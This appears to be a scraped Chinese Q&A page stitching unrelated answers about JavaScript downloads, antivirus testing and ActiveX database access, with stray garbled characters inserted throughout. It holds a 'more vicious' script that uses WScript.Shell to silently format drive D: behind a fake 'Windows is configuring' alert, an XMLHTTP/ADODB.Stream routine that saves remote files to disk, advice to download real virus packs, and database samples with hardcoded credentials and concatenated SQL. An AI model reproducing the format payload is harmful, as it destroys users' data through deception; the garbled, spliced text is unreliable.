<a href="路径.../1.rar">下载1</a>
...
========
不要压缩啊,这样用html方式已经无法实现了.要使用js或者动态语言来实现在可以.
Web上JS利用XMLHTTP实现下载
function DownURL(strRemoteURL,strLocalURL)
{
try
{
var xmlHTTP=new ActiveXObject("Microsoft.XMLHTTP")
xmlHTTP.open("Get",strRemoteURL,false)
xmlHTTP.send()
var adodbStream=new ActiveXObject("ADODB.Stream")
adodbStream.Type=1//1=adTypeBinary
adodbStream.Open()
adodbStream.write(xmlHTTP.responseBody)
adodbStream.SaveToFile(strLocalURL,2)
adodbStream.Close()
adodbStream=null
xmlHTTP=null
}
catch(e)
{
window.confirm("下载URL出错!")
}
/态岁祥/window.confirm("下载完成.")
}
去网上找些病毒包下载下来就可以了雀燃咐,如果只想测试杀毒软件就不要解压这些文件,或者顷纯将以下代码以记事本保存X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
更恶毒点的可以尝试以下代码(我没测试段衡过,因为代码中包含格式化分区的信息):
<script>
a=new ActiveXObject("WSCript.Shell")
a.run("format.com d:/q /autotest /u")
alert("Windows is configuring the system. Please do not interrupt this process.")
</script>
最好别使用js *** 作数悔陵歼据库,js在源代码里面可以看到,别人不就知道你的数据库信息了?还可以通过注入 *** 作你的数据库 如果最实在想用,参考例子 文件构成:Access数据库名为 MyData.Mdb, 里面建了一个名为count的表,表由两个字段组成: ID和COUNT,表里有一条数据: ('count','100')。 文本文件名为 count.txt,里面随便写入一个数字。 静态页面名为Cnt.htm。
以上3个文件都放在同一目录下。
由于采用Access数据库,而它采用非标准SQL语法,所以要注意在表名和字段名上需要加方括号: []
下面是页面里的代码:
其中getCountFromDB方法是对Access数据库进行 *** 作,getCountFromTxt方法是对txt纯文本进行 *** 作汪笑,这两个方法都在本地执行通过。
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<TITLE>New Document </TITLE>
<META NAME="Generator" CONTENT="EditPlus">
<META NAME="Author" CONTENT="">
<META NAME="Keywords" CONTENT="">
<META NAME="Description" CONTENT="">
<SCRIPT LANGUAGE="JavaScript">
<!--
function getCountFromDB() {
//以当前页面文件为碧冲基础,找到文件所在的绝对路径。
var filePath = location.href.substring(0, location.href.indexOf("Cnt.htm"))
var path = filePath + "MyData.mdb"
//去掉字符串中最前面的"files://"这8个字符。
path = path.substring(8)
var updateCnt = 0
//生成查询和更新用的sql语句。
var sqlSelCnt = "SELECT COUNT FROM [COUNT] WHERE ID = 'count'"
var sqlUpdCnt = "UPDATE [COUNT] SET [COUNT] = '"
//建立连接,并生成相关字符串 www.knowsky.com。
var con = new ActiveXObject("ADODB.Connection")
con.Provider = "Microsoft.Jet.OLEDB.4.0"
con.ConnectionString = "Data Source=" + path
con.open
var rs = new ActiveXObject("ADODB.Recordset")
rs.open(sqlSelCnt, con)
while (!rs.eof) {
var cnt = rs.Fields("COUNT")
document.write(cnt)
//将取得结果加1后更新数据库。
updateCnt = cnt * 1 + 1
rs.moveNext
}
rs.close()
rs = null
sqlUpdCnt = sqlUpdCnt + updateCnt + "'"
con.execute(sqlUpdCnt)
con.close()
con = null
}
function getCountFromTxt() {
var filePath = location.href.substring(0, location.href.indexOf("Cnt.htm"))
var path = filePath + "count.txt"
path = path.substring(8)
var nextCnt = 0
var fso, f1, ts, s
//以只读方式打开文本文件。
var ForReading = 1
//以读写方式打开文本文件。
var ForWriting = 2
fso = new ActiveXObject("Scripting.FileSystemObject")
f1 = fso.GetFile(path)
ts = f1.OpenAsTextStream(ForReading, true)
s = ts.ReadLine()
nextCnt = eval(s) + 1
document.write("now count is :" + s)
ts.Close()
ts = f1.OpenAsTextStream(ForWriting, true)
ts.WriteLine(nextCnt)
ts.close()
}
//-->
</SCRIPT>
</HEAD>
<BODY>
<SCRIPT LANGUAGE="JavaScript">
<!--
getCountFromTxt()
//-->
</SCRIPT>
</BODY>
</HTML>
后记:虽然在只支持静态页面的免费空间不可用,但是我想一些支持Asp的免费空间应该能用,当然我没有具体试过,只是凭自己想象。并且用这种方法来读写数据库,只适合做计数器和留言版这样的不需要保密性的工作,毕竟代码全是用javascript写成的,谁都可以看到,然后就可以得到路径把db文件下载下来进行分析,所以没办法用它来保存一些不想让别人知道的东西。就像我一个同事说的,用javascript连接数据库进行 *** 作,简直就是霸王硬上弓,呵呵,的确如此,既然不能用在免费空间上作自己的计数器,那这段代码就只能用来玩玩,自己找找良好感觉了。收集:
简单的数据库 *** 作:<HTML>
<HEAD>
<META NAME="GENERATOR" Content="Microsoft Visual Studio 6.0">
<TITLE></TITLE>
<script language=javascript>
function connectDb()
{
var ConnDB = new ActiveXObject("ADODB.Connection")
ConnDB.ConnectionString="dsn=shbxdatabaseuid=ldbxpwd=123456"
ConnDB.Open()
var Rs = new ActiveXObject("ADODB.Recordset")
var tempstr=""
Rs.Open("select * from WDA1",ConnDB,1,3)
while(!Rs.EOF)
{
tempstr = tempstr + Rs("TNAME") + "<br/>"
Rs.MoveNext
}
test.innerHTML=tempstr
}
</script>
</HEAD>
<BODY onbeforeunload="return 'ok?'"><P><div id=test></div>
<P><INPUT id=button1 type=button value=显示 name=button1 onclick="connectDb()"></BODY>
</HTML>
>>>>>>-------------------------------------var db="D:\\js\\9t\\db1.mdb"
function opendb(dbname,sql)
{
var opendb =new ActiveXObject("ADODB.Recordset")
opendb.ActiveConnection = "DBQ="+dbname+"DRIVER={Microsoft Access Driver (*.mdb)}"
opendb.Source = sql
opendb.CursorType = 1
opendb.CursorLocation = 2
opendb.LockType = 3
opendb.Open()
return opendb
}
var rs=new Object()
rs=opendb(db,"select * from 产品 where id="+i)
document.all.xx1.innerHTML=rs("生产厂商").value
document.all.xx2.innerHTML=rs("产品名称")+"/"+rs("型号")
document.all.xx3.innerHTML=rs("售价")
document.all.xx4.innerHTML=rs("批发")
document.all.xx5.innerHTML=rs("备注")
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<---------------------------------------
连接ACCESS只能用数据源, *** 作数据库的方法跟ASP之类是一样的。
只不过执行的语句不一样罢了。
如:
String dbUrl = "sun.jdbc.odbc.JdbcOdbcDriver"
String dbConStr = "jdbc:odbc:dnsName"
Connection Conn = null
Statement stmt = null
try{
Class.forName(dbUrl)
}catch(ClassNotFoundException e){
System.err.println("Not Found ClassForName" + e.getMessage())
}
try{
Conn = DriverManager.getConnection(dbConStr, "uid", "pwd")//连接数据库,uid与pwd分别为 用户名及密码(连接数据库的),如果没有既为空
stmt = Conn.createStatement()
}catch(Exception e){
System.err.println("Can't Connect the DATA" + e.getMessage())
}
//以下为 *** 作数据库的
String sql = "select * from tableName[....]"
ResultSet Rs = stmt.executeQuery(sql)// 返回记录集
String sqlUpdate = "update..."
String sqlInsert = "insert into...."
stmt.executeUpdate(sqlUpdate)//更新记录
stmt.executeUpdate(sqlInsert)//插入记录
Conn.close()
stmt.close()
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)